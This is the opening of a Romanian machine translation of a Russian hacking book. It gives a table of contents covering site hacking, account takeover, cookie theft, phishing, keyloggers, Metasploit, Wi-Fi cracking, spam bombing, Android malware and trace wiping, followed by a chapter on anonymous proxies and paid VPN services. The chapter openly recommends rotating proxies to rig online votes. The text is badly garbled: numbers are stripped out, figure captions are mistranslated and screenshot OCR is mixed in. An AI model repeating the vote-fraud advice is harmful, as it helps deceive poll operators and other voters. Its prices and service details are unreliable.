﻿Yaroshenko A A HACKING PE EXEMPLE VULNERABILITĂȚI, hacking, PROTECȚIE -Nici unul Editura] "Știință și tehnologie" Sankt Petersburg UDC BBK Yaroshenko A A HACKING PE EXEMPLE Vulnerabilități, HACKING, PROTECȚIE - St Petersburg: Science and Technology, - p , ill ISBN - - - - Nu veți învăța cum să piratați băncile din această carte - nimic ilegal nu va fi descris aici Nu vrem ca cititorii noștri sau oricine altcineva să aibă probleme din cauza cărții noastre Se va spune: despre principiile de bază ale site-urilor de hacking (și pentru ca teoria să nu se abate de la practică, se va lua în considerare un exemplu real de hacking); un capitol separat va fi dedicat deturnării cutiei poștale (vom arăta cum este piratată o cutie poștală - vor fi luate în considerare diferite metode) Veți învăța: cum funcționează comunicarea anonimă în rețea prin e-mail și tot felul de mesagerie instant; cum să vizitezi site-urile în mod anonim, cum să creezi o cutie poștală anonimă și ce messenger vă permite să vă înregistrați fără a fi legat de un număr de telefon Vor fi luate în considerare cele mai populare instrumente de hacker - Kaii Linux, care conține câteva sute (mai mult de ) de instrumente axate pe diverse sarcini de securitate a informațiilor; și un instrument pentru găsirea vulnerabilităților și hacking-ul sistemelor informaționale - Metasploit Un capitol separat este dedicat spargerii parolelor Vom sparge în principal parola contului Windows și vom vedea cum pot fi sparte criptarea EFS și unitatea criptată BitLocker Să ne uităm și la cum este spartă o parolă WiFi Majoritatea sarcinilor nu necesită cunoștințe speciale, altele decât abilitățile de bază de calculator Și pentru cei care vor să stăpânească trucurile "mai serios", va trebui să cunoașteți elementele de bază ale programării Toate drepturile rezervate Nicio parte a acestei cărți nu poate fi reprodusă sub nicio formă fără permisiunea scrisă a deținătorilor drepturilor de autor Iideelmgtv nu este răspunzător pentru nicio daune cauzate de utilizarea materialelor din această carte, precum și pentru disponibilitatea materialelor, referințe la care puteți găsi în această carte La momentul pregătirii cărții pentru publicare, toate linkurile către resursele de pe Internet erau valabile Numerele de contact ale editorului: ( ) Site oficial: www nit coni ru (c) Yaroshenko A A (c) Știință și tehnologie (aspect original) Conţinut Introducere VL ERORI COMUNE DE HACKER - Lenea Încrederea în sine Prostia LA SURSE DE INFORMAȚII ȘI V Z CUM SĂ CITI ACEASTA CARTE Capitolul MODALITĂȚI DE LUCRARE-PRIN INTERDICȚIA SCHIMBAREA REȚELEI ANONIMIZANT SERVERE PROXY ANONIME TREI SCRISORI prețuite - VPN Informații de bază Prezentare generală a furnizorilor VPN populari Capitolul Cum să piratezi un site web - DE CE ESTE HACKAT SITE CUM SUNT HACKATE SITE - EXEMPLU REAL: HACKAREA SALA DE VOT Alegerea modului cel mai bun Trișează folosind anonimizatoare Proxy anonimi Defalcarea votului Automatizarea Cum să te protejezi de hacking? capitolul CAL TROIAN HACKING CU NUMĂR DE TELEFON - ACCES FIZIC LA CALCULATOR INGINERIA SOCIALĂ SAU PRINCIPALĂ ÎNCĂLĂCIUNE CUVÂNT LA MODĂ "PHISHING" RECUPERAREA PAROLEI FURT DE COOKIES VULNERABILITĂȚI XSS METODA FORŢEI IMPACT Capitolul : Cum să trimiteți e-mailuri și alte comunicații electronice în mod anonim COMUNCILE PARANOIDULUI SCOPUL ANONIMITĂȚII CUȚIILOR POȘTALE - OBȚIUNEA POSTA ANONIMĂ - CARE MESAGER ESTE CEL MAI ANONIM - Telegramă Viber Whatsapp Semnal Briar Mesageri de rețele sociale WickrMe Sârmă Capitolul Anonimitatea pe Internet Este posibil? ANONIMI PARȚIAL LANȚURI DE PROXY PROIECTUL TOR Ce este Tog Cum funcționează browserul Tor Cine folosește Tog și de ce? Ce este mai bun VPN sau Tor? Tog și VPN Utilizarea browserului Tor pe Windows Tor de reglaj fin Instalarea Tor în Android VPN PENTRU LINUX CE ESTE DARKNET? PE Drum SĂ COMPLETEAZĂ ANONIMUL DAR Capitolul Ce este Kaii Linux și cum să-l folosești pentru hacking PE SCURT DESPRE KALI - UNDE SE DESCARCĂ ŞI CUM SE INSTALĂ KALI LINUX ÎNTREȚINEREA SISTEMULUI Menținerea surselor pachetelor Eroare "Discul conține un sistem de fișiere necurat ( , ) Metadatele păstrate în cache Windows, a refuzat montarea" Curăţarea regulată a sistemului Setarea parolei de root Conectați-vă ca root PREZENTARE GENERALĂ A CEL MAI BUNE INSTRUMENTE KALI LINUX l WPScan Nmap Lynis Aircrack-ng Hidra Wireshark Cadrul Metasploit Skipfish , Sqlmap spargerea parolei Windows Ioan Spintecătorul Wireshark - Capturarea traficului Autopsy Forensic Browser: Instrument profesional Aplicarea legii Nikto Sforâie Flux de aer Apktool Nessus - Cel mai bun scaner de vulnerabilități fcrackzip - spargerea parolei arhivei Zip Capitolul Secretele Metasploit CE ESTE METASPLOIT STRUCTURA CADRU TERMINOLOGIE DE BAZĂ CONFIGURAȚII CADRU ȘI COMENZI DE BAZĂ CONFIGURARE MODULE G PORNIREA METASPLOIT PENTRU PRIMA Oara UTILIZARE PRACTICĂ A COMANDĂRILOR METASPLOIT comandă de ajutor - obținerea de ajutor comandă de utilizare - selectarea unui modul de utilizat Comandă show - Afișarea entităților comenzi set și setg - setarea valorilor variabilelor Comanda de verificare - Verificarea sistemului țintă Comanda bask - intoarcere Comanda Gip - Rulați un Exploit Comanda resursă - definirea unei resurse Comanda irb STUDIU DE CAZ : HACKAREA UNUI SERVER VECHI WINDOWS UTILIZAREA NSA EXPLOIT STUDIU DE CAZ : HACKAREA SISTEMELOR MODERNE - WINDOWS SERVER ȘI WINDOWS Capitolul Hacking și protejarea conturilor de social media CINE HACKEAZA CONTUL SI DE CE CULEGEREA INFORMAȚIILOR METODE DE HACKING Hacking e-mail Inginerie socială Parola brute-force Phishing sau pagină falsă Ghid foarte detaliat Keylogger Falsificarea DNS CUM SE PROTECȚIE ÎMPOTRIVA HACK-ULUI Capitolul Schimbarea parolelor și obținerea accesului la date criptate RESETARE PAROLA WINDOWS Resetarea parolei cu PowerShell Schimbarea parolei cu Lazesoft Recover My Password Resetați parola Windows prin modul de recuperare OBȚINEREA ACCES LA FIȘIERE CRIPTATE FOLOSIND EFS Ce este EFS? Activarea criptării EFS Utilizarea Advanced EFS Data Recovery pentru a decripta fișierele criptate EFS RESTAURAREA ACCESULUI LA BITLOCKER Caracteristici de implementare Detalii tehnice Activați criptarea și restaurați accesul folosind cheie de recuperare Caracteristici suplimentare BitLocker Hacking HACKAREA PAROLEI ROOT ÎN LINUX CRUNCH UTILITY: GENERATOR DE PAROLĂ Capitolul MOTIVE PENTRU HACKING Îți ÎNVĂȚI PAROLA WIF SCHIMBAREA ADRESEI MAC HACKAREA RUTELOR FOLOSIND VULNERABILITATEA - Instalarea și pornirea instrumentului Verificarea vulnerabilității pentru toate exploit-urile Verificarea unei vulnerabilități specifice Utilizarea exploit-urilor HACK WPA -POYTEPA MITURILE ȘI REALITATEA AUTOMATIZAREA HACKINGULUI FOLOSIND WIFITE APLICAȚIE ANDROID PENTRU WIFI BROOT-FORCING CUM SĂ OBȚIUNI UN DICȚIONAR BUN DE HACKING REALITATEA Capitolul Ștergerea listelor de locuri și programe recente - ȘTERGEREA LISTEI DE UNități USB ȘTERGEREA CACHE-ULUI ȘI A ISTORICULUI BROWSER ȘTERGERE ÎNREGISTRĂRI DNS ȘTERGEREA COOKIES-urilor FLASH ȘTERGEȚI LISTA DOCUMENTELOR RECENTE MS OFFICE AUTOMATIZAREA CURĂȚĂRII CU CCLEANER - ȘTERGERE REALE FIȘIERE CREAREA UNUI FIȘIER WAT PENTRU A CURĂȚA TOTUL SE CREAȚI SCRIPT AUTOHOTKEY PENTRU CURĂȚARE TOTAL Capitolul CUM SE RECUPERA PAROLA TOTAL COMMANDER SMS GRATUIT ÎN TOATE LUME - OBLIGAREA TRAILELOR ÎN Jurnalele SERVERULUI FURAT WINRAR SISTEM DE OPERARE PRIVAT KODACHI PRIVAT POSSUM PENTRU FIREFOX OBȚINEM INFORMAȚII CONFIDENȚIALE DESPRE UTILIZATOR- LE FACEBOOK LOCAȚIA UTILIZATORULUI GMAIL AUTORIZARE WI-FI BYPASS CU ACCES OASPAȚI SPARGERE WI-FI PLATIT ÎN HOTEL SITE DE SCHIMBARE A VOCILOR SPAMUL UNUI PRIETEN PE TELEGRAM CU TERMUX ÎNVĂȚAREA ADRESEI IP PRIN TELEGRAMĂ CUM SĂ UCIZI DUMANUL DISPOZITIVULUI ANDROID CRIPTAREA VIRUSULUI PENTRU ANDROID Răzbunare dușmanul cu ajutorul callspam ALTA BOMB-SPAMMER TVOMV - HACKING INSTAGRAM ROUTER DDOS-ATAKA SPLOITUS - GĂUTĂTOR DE VULNERABILITATE PROASPĂTĂ CONT TELEGRAM MARE - CUM PUNEȚI WIFI VECIN SAU CONCURENTOR webproxy - *| Anonimizator online gratuit - Whoer net Anonymizer by Whoer net este o modalitate simplă și gratuită de a vă schimba adresa IP deblocați accesul la site-uri, asigurați-vă anonimatul în X http://daidostup me • DiAccess - Anonimizator gratuit pentru acces la Pop ѵ bujori și vionmmaitva ajutând la deschiderea oessppy vinovat Orez Cum să determinați tipul de protocol după adresa site-ului Servere proxy anonime Proxy-urile anonime sunt site-uri de pe Internet configurate să acționeze ca intermediari între site-ul dvs și site-ul pe care doriți să îl accesați Doar introduceți interogarea proxy anonimi în motorul de căutare și veți vedea o listă de resurse în care puteți găsi aceleași proxy anonimi De regulă, listele de servere proxy sunt actualizate la fiecare oră Pentru ce? Pentru că în forma sa obișnuită, un proxy anonim este cel mai comun server proxy pe care administratorul l-a uitat sau nu a avut timp să-l configureze corect, deci permite conectarea nu numai GfQ " ІС proxy anonimi X В J|r Q Bre Q Imagini în videoclip (Q) Știri Q Maps Instrumente de setări Fuift Rezultate: Aproximativ T OvO ( , sec ) https://hldemy name > proxy-tist •• Liste de proxy, listă gratuită de proxy anonimi O listă de proxy-uri gratuite de pe tot internetul Q Numai serverele rgoxy funcționale au fost testate pentru viteză, țară și anonimat Exportați în txt, csv, https://xseo ln" proxytJst" Proxy anonimi Lista de proxy anonimi Apep Proxy anonimi Lista de proxy anonimi Proxy anonimi Proxy-uri HTTP și SOCKS Proxy anonimi și de elită HTTP, SOCKS , SOCKS https://nj wlKlpedia org > wtkt > OpenA lroxy - Deschideți proxy - Wikipedia Accesați interzicerea proxy-urilor deschise anonime - Proxy-urile deschise anonime pot fi utilizate pentru https://spys one > argoxy " Servere proxy anonime gratuit, liste de live Deschideți servere proxy anonime Listă numai de servere proxy anonime active pentru a ascunde adresele IP Orez Rezultate anonime ale căutării proxy utilizatori interni, dar și orice alții - din toată lumea Puteți folosi această oportunitate în următoarele scopuri: Schimbarea adresei IP - atunci când vă conectați printr-un server proxy anonim la alte noduri, acestea vor vedea nu adresa dvs IP reală, ci adresa IP a serverului proxy Acest lucru este util, de exemplu, pentru a schimba țara de "reședință" Unele resurse blochează accesul utilizatorilor din anumite țări Utilizarea unui server proxy anonim elimină acest neajuns De exemplu, dacă un site necesită un IP german, trebuie să găsiți un proxy german și să vă conectați prin el Obținerea accesului la un site blocat - așa cum a fost descris mai devreme, ISP-ul va vedea că computerul tău "vorbește" cu o gazdă deblocata Și ce se întâmplă în continuare - nu mai poate vedea Și apoi acest nod intermediar deblocat se va conecta la nodul de care aveți nevoie și puteți deschide resursa blocată Metoda de ocolire prin servere proxy anonime este potrivită pentru: • Acces la o gazdă blocată de la o rețea de furnizori corporativi sau de acasă • Trișare rezultate ale votului - de regulă, toate buletinele de vot iau în considerare adresa IP a nodului și nu permit votul de mai multe ori cu un IP Schimbând serverele proxy, poți vota de mai multe ori și, prin urmare, poți ajuta prietenul tău sau chiar tu însuți să obțină un loc mai înalt în clasament Când "fășoară" câteva sute de voturi în ochii prietenilor tăi, vei fi un adevărat hacker! • Schimbarea adresei IP - am vorbit deja despre asta Proxy-urile anonime reprezintă un risc de securitate Da, listele de proxy sunt actualizate la fiecare oră Cine le actualizează și cine găsește proxy-uri publice în rețea? Voluntari Ei publică listări pe site-ul lor, site-ul găzduiește reclame, iar veniturile din reclame le generează câștigurile Totul pare a fi logic Dar dacă examinați listele de proxy pentru o perioadă, să zicem pentru o săptămână sau chiar o lună, atunci veți vedea că unii proxy nu părăsesc niciodată lista - ei există tot timpul Aici începe să se prăbușească legenda administratorilor uituci Are sens ca cineva să implementeze un proxy și să ofere acces gratuit tuturor? Astfel de proxy-uri pot fi implementate de hackeri sau chiar agenții de informații pentru a vă intercepta datele Când datele dvs trec printr-un proxy, sunt complet disponibile pentru proprietarul proxy-ului - la urma urmei, trec prin echipamentul său De aceea, un proxy poate fi folosit dacă nu intenționați să transferați date confidențiale Nu vă recomandăm să utilizați proxy anonimi pentru a vă introduce în căsuța poștală, pagina dvs de pe o rețea socială etc Dacă trebuie să vă conectați la un tracker torrent blocat în țara dvs pentru a descărca un film, muzică sau program, acesta este De asemenea, puteți vota un prieten sau o prietenă adăugând voturi suplimentare De asemenea, puteți accesa un site care blochează accesul din țara dvs Adesea, acest lucru se întâmplă cu site-urile canalelor de televiziune - "Conținutul este blocat în țara ta" - inscripția este familiară tuturor În general, pentru tot ceea ce nu necesită introducerea de date confidențiale (parole, informații de plată etc ) - puteți utiliza proxy anonimi Acum, să vedem cum să le folosim Accesați orice site cu o listă de proxy Formatul listei este întotdeauna diferit, dar în general este: adresa IP, port, țară, tip proxy, viteză Restul informațiilor nu-l interesează De asemenea, nu ne interesează proxy-urile de tip SOCKS, avem nevoie doar de HTTP/HTTPS Prin urmare, dacă site-ul are un filtru, trebuie să filtrați proxy-urile HTTP / HTTPS, astfel încât restul să nu interfereze Viteza vă permite să înțelegeți cât de repede se vor deschide site-urile prin acest proxy Cu cât viteza este mai mare, cu atât mai bine Rămâne doar să configurați browserul: • Chrome, IE, Edge - setările se fac prin fereastra Opțiuni, Rețea și Internet, Server proxy Activați opțiunea Utilizare server proxy și setați adresa IP și numărul de port al serverului proxy care a fost găsit în listă Faceți clic pe butonul Salvare Reveniți la fereastra browserului și accesați site-ul https://myip ru/ Vizualizați adresa dvs IP El trebuie să se schimbe Dacă nu știați care este adresa dvs IP înainte, trebuie să o aflați înainte de a porni proxy-ul Sau dezactivați proxy-ul, reîmprospătați pagina myip ru Concluzia este că, dacă ați făcut totul corect, adresa IP ar trebui să se schimbe după pornirea proxy-ului • Firefox - selectați Setări, Opțiuni de rețea, faceți clic pe butonul Personalizare În fereastra care apare, selectați Setări manuale proxy și introduceți setările serverului proxy - adresa IP și portul acestuia Apăsați butonul OK și accesați site-ul myip ru pentru a vedea adresa IP Dacă totul este în regulă (IP-ul s-a schimbat), puteți vizita resursele blocate Gimmry DX Server proxy de acasă Setare manuală de proxy Rețea și Internet Utilizarea unui server proxy pentru a vă conecta la fthernet sau rețele Wi-R Aceste setări nu se aplică conexiunilor VPN Stare Utilizați serverul proxy % W" Fi & ) 'MKA Adresă IP Fthernet > Port ** Apelare Nu utilizați un server proxy pentru adrese care VPN-urile încep cu următoarele intrări Utilizați punct și virgulă pentru a separa înregistrările fz Airplane te mode' ■ m HOT-SPOT mobil ( I'gk-lyltyaani*' secară (c) Server proxy Aveți întrebări? Orez Setări Chrome, IE, Edge Dacă schimbarea proxy-urilor nu este un eveniment unic și intenționați să schimbați serverele proxy în mod regulat, vă putem recomanda extensia FoxyProxy Extensia vă permite să adăugați servere proxy la propria listă și să comutați convenabil între ele (Fig ) Hacking cu exemple Orez Configurarea Firefox Orez Aplicația Foxy Proxy Trei scrisori prețuite - VPN informatii de baza VPN (Virtual Private Network) - rețea privată virtuală Anterior, acest instrument era folosit exclusiv de specialiști IT cu înaltă calificare - administratori de rețele corporative mari, specialiști în securitatea computerelor etc Recent, cu VPN aproape fiecare gospodină este familiară De ce? În primul rând, pentru că utilizarea unui VPN a devenit extrem de simplă În al doilea rând, era o astfel de nevoie Un VPN este o tehnologie multifuncțională și folosirea acesteia doar pentru a vă schimba adresa IP este ca și cum ați împușca vrăbii cu un tun Iată pentru ce poate fi folosit un VPN de către un utilizator obișnuit: Protecția datelor transmise prin rețea - VPN criptează toate transmise prin datele din rețea Vom vorbi despre asta mai târziu Schimbați țara, adresele IP - ca proxy-uri anonime, VPN-urile pot fi folosite utilizați pentru a schimba țara și adresa IP Acces la site-uri restricționate - deoarece vă veți conecta prin intermediul VPN, atunci rețeaua virtuală privată va acționa ca intermediar În comparație cu proxy-urile anonime, principiul este același, dar, în același timp, toate datele conexiunii VPN sunt criptate și nu pot fi decriptate nici de furnizorul dvs , nici de oricine de-a lungul căii acestor date Dacă s-au spus deja multe despre accesul la site-uri închise și schimbarea adresei IP în acest capitol, atunci să ne oprim asupra protecției informațiilor transmise Datele pot fi interceptate în orice stadiu al transmiterii lor Să ne imaginăm că ești conectat la o rețea publică sau la rețeaua Wi-Fi a unui hotel, restaurant sau cel puțin la rețeaua unui vecin - la orice rețea care a fost configurată de o terță parte Datele transmise trec prin routerul de rețea și pot fi interceptate pe acesta La urma urmei, nu o cutie ieftină pentru - USD poate acționa ca un router, ci un computer cu drepturi depline care vă înregistrează traficul Datele pot fi interceptate de către furnizor - la urma urmei, ele nu trec prin echipamentul său Chiar dacă furnizorul dvs nu interceptează datele, acestea nu ajung imediat la gazda de destinație În drum spre acest nod, trec prin multe routere și teoretic pot fi interceptați pe oricare dintre ele Orice router de-a lungul căii pachetului îl poate intercepta Dar toate datele pe care le transmiteți trec prin toate aceste routere Nu toate site-urile folosesc https/SSL pentru a cripta datele și există deja modalități de a decripta traficul HTTPS Puteți proteja datele transmise prin rețea folosind o VPN (Virtual Private Network) VPN-ul creează un tunel criptat prin care sunt transmise datele dvs Datele transmise vor fi criptate, deci chiar dacă cineva le interceptează, nu se poate face nimic cu ele Cu toate acestea, trebuie să înțelegeți că există câteva caracteristici ale utilizării acestei tehnologii: Datele pot fi interceptate chiar de furnizorul VPN Deși unii Unii furnizori susțin că nu înregistrează acțiunile utilizatorului, în majoritatea cazurilor aceasta este o minciună Aproape toți furnizorii VPN cunoscuți colectează cât mai multe informații despre utilizator - în acest fel sunt reasigurați în cazul în care utilizatorul comite acțiuni ilegale în rețea Dacă aveți nevoie de un VPN real, puteți cumpăra un server virtual (în afara țării) și puteți configura un VPN pe el (există multe instrucțiuni pe Internet) Apoi plata se va face nu către furnizorul VPN, ci către furnizorul de cloud pentru închirierea unei mașini virtuale La stabilirea unei conexiuni VPN, tot traficul va trece prin această conexiune nu Aceasta înseamnă că browserul, Skype, toate mesageria instantanee, clientul de e-mail și alte programe vor funcționa prin această conexiune Este important de înțeles că în cele mai multe cazuri o conexiune VPN este plătită și o anumită cantitate de trafic este inclusă în planul tarifar Deoarece după ce conexiunea VPN este stabilită, toate programele vor funcționa prin aceasta (inclusiv clientul torrent), volumul de trafic achiziționat se va termina rapid Prin urmare, conexiunea VPN trebuie utilizată cu moderație - dezactivați-o când nu aveți nevoie de ea și monitorizați ce programe de rețea rulează atunci când conexiunea VPN este activă Dacă scopul final este ascunderea numai a traficului web (http/https), atunci puteți utiliza fie Tor (https://www torprojectorg/), fie browserul Opera, care are deja funcționalitate VPN încorporată Există mulți furnizori VPN Toate funcționează aproximativ în același mod: utilizatorul descarcă programul client, cumpără un pachet pentru acces VPN, lansează programul, își specifică datele (login și parola) și apasă butonul Conectare sau altul similar - după semnificație Iată o listă a unor furnizori VPN populari cu câteva comentarii: • Acces privat la Internet (https://privateintemetaccess com/) - oferă acces de testare pentru o perioadă de zile, costul pe lună este de , USD, atunci când este plătit pentru un an - , USD/an Serverele sunt situate în SUA, Germania, Marea Britanie, Canada, Franța, Suedia, Țările de Jos, China, România și alte câteva țări ( de țări în total) Când stabiliți o conexiune, utilizați Vizitatorul poate alege țara căreia îi va aparține adresa IP de ieșire (care va fi "văzută" de site-urile pe care le vizitează) HideMyAss (https://hidemyass com/) - prețuri reduse recent și acum costul pe lună este puțin mai mic de USD, pentru un an puțin mai puțin de USD, nu există perioadă de testare, dar există returnarea banilor, termenul din care este de de zile (platesti pentru o luna, daca ceva nu ti se potriveste, atunci ti se vor returna banii) Serverele sunt situate în de țări ale lumii Până acum acesta este cel mai ieftin furnizor ExpressVPN (https://www express-vpn com/) este un furnizor VPN cu prețuri mari ( , USD pentru un an, , USD pentru o lună), dar compensează prin faptul că viteza și traficul nu sunt limitat în vreun fel Deși pe fundalul NMA, oferta ExpressVPN pare cosmic de costisitoare VPNShield (https://www vpnshieldapp com/) - Cu sediul central în Europa, prin urmare, nu este supus legii SUA și este posibil ca furnizorul să nu salveze jurnalele de acces În plus, și-a scăzut recent prețurile, ceea ce o face o opțiune foarte bună Bettemet (https://www bettemet co/) este un serviciu VPN gratuit Clienți există pentru Windows, Android (pot fi descărcați de pe Google Play), iOS (disponibil în App Store) Există și o versiune plătită - , USD/lună Pentru acești bani, utilizatorul va putea selecta locația serverului, conexiune mai rapidă, fără anunțuri și va putea conecta până la dispozitive per cont Versiunea gratuită nu necesită înregistrare, dar viteza de acces lasă uneori de dorit Opera - un serviciu VPN gratuit este deja încorporat în browserul Opera Pentru a-l activa, trebuie să deschideți setările browserului Activarea/dezactivarea serviciului VPN se face prin apăsarea butonului VPN din bara de adrese Culoarea portocalie a butonului indică faptul că VPN-ul este dezactivat (Fig ) Activarea VPN face ca datele trimise și primite de browser să fie transmise prin VPN Vă rugăm să rețineți: datele din alte programe de rețea, spre deosebire de utilizarea serviciilor de mai sus, vor fi transmise printr-o conexiune normală, necriptată Dacă trebuie doar să vizitezi un site blocat din când în când, atunci folosirea Opera poate fi o mană cerească Viteza de descărcare a fișierelor nu este întotdeauna mare, dar site-urile prin VPN-ul încorporat se deschid la o viteză acceptabilă Notă Capitolul va acoperi și un alt serviciu VPN Punctul culminant - într-un simplu client VPN pentru Linux, lucrând în imaginea și asemănarea clienților VPN familiari - a lansat programul și a apăsat butonul Conectare sau similar Nu toate serviciile VPN oferă clienți VPN atât de comozi pentru Linux Dimpotrivă, a trebuit să încercăm găsiți un astfel de serviciu Se plătește, dar prețul său nu depășește tarifele serviciilor discutate în acest capitol Există chiar și un tarif unic Eternity la un preț de USD, plătind pe care nu îl veți plăti mai mult pentru VPN Ce sa aleg? Totul depinde de scopul final: • Utilizare ocazională pentru a vizita site-uri blocate - cea mai bună opțiune Bettemet - nu este nevoie să plătiți și puteți conecta până la dispozitive per cont De asemenea, puteți lua în considerare utilizarea browserului Opera • Obținerea accesului la un site care necesită o adresă IP a unei anumite țări din lume - aici trebuie să selectezi serviciul ale cărui servere se află în țara dorită Cea mai bogată alegere este la HideMyAss, ale cărui servere sunt situate în de țări ale lumii • Utilizare regulată pentru a cripta tot traficul - VPNShield este cel mai bun Prețurile democratice și compania nu se află în SUA, așa că este posibil ca jurnalele de acces să nu fie salvate Prezentare generală a furnizorilor VPN populari Dacă vă place să înțelegeți totul și să abordați cu atenție alegerea unui furnizor VPN, atunci această secțiune este special pentru dvs Scut VPN Serviciul https://www vpnshieldapp com/ are prețuri foarte accesibile Deci, o săptămână de acces va costa doar , USD, iar o lună - doar , USD Un abonament pentru luni poate fi achiziționat pentru USD, iar pentru un an - pentru USD De menționat că anul acesta acest serviciu a crescut în preț Anul trecut, un an de acces a putut fi achiziționat pentru USD Pe de altă parte, se desfășoară în mod regulat diverse promoții și la momentul acestor rânduri este disponibilă o promoție care vă permite să cumpărați ani de acces la USD Iese la , USD pe lună, ceea ce este foarte, foarte ieftin - mai ieftin decât accesarea serviciului Youtube Music Compania este situată în Luxemburg, ceea ce înseamnă că nu este supusă legii SUA, dar compania are servere în SUA, Germania, Anglia, Olanda și China Serviciul acceptă toate protocoalele populare: PPTP, L TP, IPsec, OpenVPN Dezavantajele includ serviciul de suport, care funcționează doar prin e-mail - un mijloc de comunicare nu foarte eficient Dar compania nu colectează (dacă o face, nu se spune în mod explicit despre asta) informații despre utilizatori Este disponibil un client Android, care poate fi accesat din Pia Market, ceea ce va simplifica configurarea unui dispozitiv de utilizator pentru a lucra cu acest serviciu: https://play google com/store/apps/details?id=com vpnshieldapp&hl=ru Sunt disponibili și clienți pentru sistemele de operare Windows și iOS (iPhone), acoperind cele mai populare dispozitive din lume Vanish VPN Acest serviciu are sediul (https://www ipvanish com/) în SUA Acesta este un important furnizor de VPN american Există trei planuri tarifare - fie în fiecare lună , USD, fie la fiecare trei luni USD sau o dată pe an, dar USD Traficul (indiferent de planul tarifar selectat) nu este limitat Spre deosebire de VPNShield, acest serviciu, dimpotrivă, a scăzut de două ori de preț și poate revendica titlul de cel mai ieftin serviciu VPN Nu există atât de multe puncte de prezență ca furnizorul anterior, dar nu puține Serverele sunt situate în SUA, Canada, Regatul Unit, Franța, Japonia, Malaezia, Ungaria, Țările de Jos, Africa de Sud, Spania, Suedia și Coreea de Sud Acest serviciu colectează informații despre utilizatori și funcționează conform Politicii DMCA privind drepturile de autor Totuși, site-ul spune că sunt colectate doar cele mai necesare informații, dar care nu este raportată Sunt acceptate protocoalele PPTP, L TP și OpenVPN Nici IPSec nu este acceptat în acest caz Dezavantaje: înregistrarea informațiilor utilizatorului și lipsa capacității de a utiliza IPSec HideMyAss (HMA) Sediul acestui serviciu (http://hidemyass com/) este situat în Anglia, dar există puncte de prezență în de țări ale lumii (sunt în total de servere) Oferă un număr mare de servicii suplimentare, dar descrierea celor mai multe dintre ele nu se potrivește cu ceea ce este indicat pe site După cum sa menționat deja, serviciul VPN a redus prețurile, iar acum costul pentru anul este puțin sub USD și chiar mai puțin în timpul oricăror promoții Pentru pretul pe care se poate m""иініііііііIM acum concurează cu IPVanish, iar recent a fost foarte scump - timp de o jumătate de an trebuia să plătești USD Există suport pentru protocoalele L TP, OpenVPN, PPTP (IPSec nu este acceptat) Serviciul recomandă utilizarea protocolului OpenVPN Acest serviciu are și dezavantaje semnificative Serviciul colectează o mulțime de informații despre activitățile utilizatorului și stochează informațiile timp de doi ani Deci numele serviciului nu este în întregime adevărat De asemenea, nu există nicio posibilitate de a utiliza protocolul IPSec și nu există clienți pentru Android Acces privat la internet Private Internet Access (http://privateinternetaccess com/) este unul dintre cele mai vechi servicii VPN care oferă servicii de anonimizare online Pe lângă serviciile obișnuite (anonimizare, confidențialitate, criptare), acestea oferă protecție împotriva modificărilor la serverele DNS (protecție împotriva scurgerilor DNS) De asemenea, utilizatorul are posibilitatea de a folosi până la trei dispozitive în același timp Primul lucru pe care utilizatorii îl acordă atenție atunci când aleg un serviciu VPN (și orice altceva în majoritatea cazurilor) sunt planurile tarifare Există trei planuri tarifare: pe o lună, pe un an și pe trei ani Cel mai scump prim plan tarifar este de , euro (euro, nu dolari!) pe lună, în al doilea caz, o lună de acces va costa , euro ( , euro pe an), în al treilea caz, trebuie să plătiți de euro ( , euro pe lună) timp de trei ani Dacă luăm în considerare prețul pe an, atunci acesta este unul dintre cele mai scumpe servicii VPN din lume, dar dacă aveți de euro și dorința de a vă despărți de ei, atunci prețul devine destul de plăcut Anterior, ani de acces ar fi costat de euro Toate planurile tarifare oferă aceleași servicii și posibilitatea de a utiliza diferite tipuri de conexiuni (OpenVPN, PPTP și IPSec), trafic nelimitat (adică , USD este costul final, nu trebuie să plătiți pentru nimic altceva) și posibilitatea de a alege un gateway in orice tara in care functioneaza serviciul, si anume: SUA, Marea Britanie, Germania, Canada, Franta, Suedia si Elvetia, Olanda, Hong Kong (Republica Populara Chineza), Romania Serviciul oferă acces gratuit la probă pentru o perioadă de zile Există, de asemenea, o garanție de returnare a banilor de zile dacă nu vă place Suportul tehnic este oferit prin e-mail și prin chat-ul site-ului Site-ul în sine are o listă destul de extinsă de întrebări frecvente Serviciul oferă propriii clienți VPN pentru Android Clientul VPN pentru Android X/ X poate fi instalat din Play Market: https://play google com/store/apps/details?id=com privateintemetaccess android Pentru versiunile mai vechi ( x și x), clientul poate fi descărcat de pe site-ul web al serviciului VPN: https://www privateintemetaccess com/pages/client-support/iiandroid ipsec l tp Desigur, ca tot în lume, acest serviciu are dezavantaje: • Nu sunt furnizate informații despre volumul de lucru al canalelor și serverelor de transmisie a datelor Când alegi un server, nu știi cât de repede va fi • Dacă un utilizator încalcă drepturile de autor, informațiile despre el vor fi trimise direct deținătorului drepturilor de autor (Digital Millennium Copyright Act) • Un număr mic de puncte de prezență - doar țări, deși există multe mai multe porți de acces, dar multe dintre ele sunt situate în diferite părți ale SUA, Canada și Marea Britanie StrongVPN Serviciul StrongVPN (https://strongvpn com/) este tot din SUA Este unul dintre primii furnizori care furnizează servicii de criptare pentru informațiile transmise Pe site-ul de servicii veți găsi multe planuri tarifare diferite și destul de flexibile și o cantitate imensă de documentație cu care puteți configura orice dispozitiv care acceptă VPN În prezent, există două planuri tarifare - fie USD pe lună, fie USD pe an Nu există alte opțiuni Nu există o perioadă de probă, dar compania garantează banii înapoi dacă nu vă configurați sau nu utilizați o conexiune VPN în decurs de zile, indiferent de planul tarifar ales Ca și în cazul precedent, puteți utiliza OpenVPN, L TP / IPSec și PPTP Dacă ceva nu merge, asistența / vă stă la dispoziție (prin chat, prin e-mail, prin telefon și Skype) Da, suportul, ca și în cazul precedent, se realizează în limba engleză Uriașul dezavantaj al acestui serviciu este că funcționează complet în cadrul legilor SUA, adică compania salvează toate informațiile despre domeniu gazdă, inclusiv jurnalele de acces, informațiile personale, timpul de conectare și chiar adresa IP din rețeaua internă din spatele routerului (!) Dacă aveți nevoie de anonimat și confidențialitate, atunci aceasta nu este în mod clar o opțiune Un alt dezavantaj al serviciului este că nu există software client, adică utilizatorul va trebui să-și configureze singur dispozitivul Pentru ce astfel de bani - nu este clar ExpressVPN Tânăr furnizor VPN (https://www express-vpn com/) cu prețuri destul de mari Pentru o lună trebuie să plătiți , USD sau , USD pentru un an Compania garantează o rambursare în termen de de zile dacă aveți probleme cu utilizarea serviciului De asemenea, sunt puține puncte de prezență: SUA, Marea Britanie, Țările de Jos, Canada, Germania, Hong Kong Utilizatorul poate selecta oricare dintre servicii și poate comuta între ele Avantajele acestui 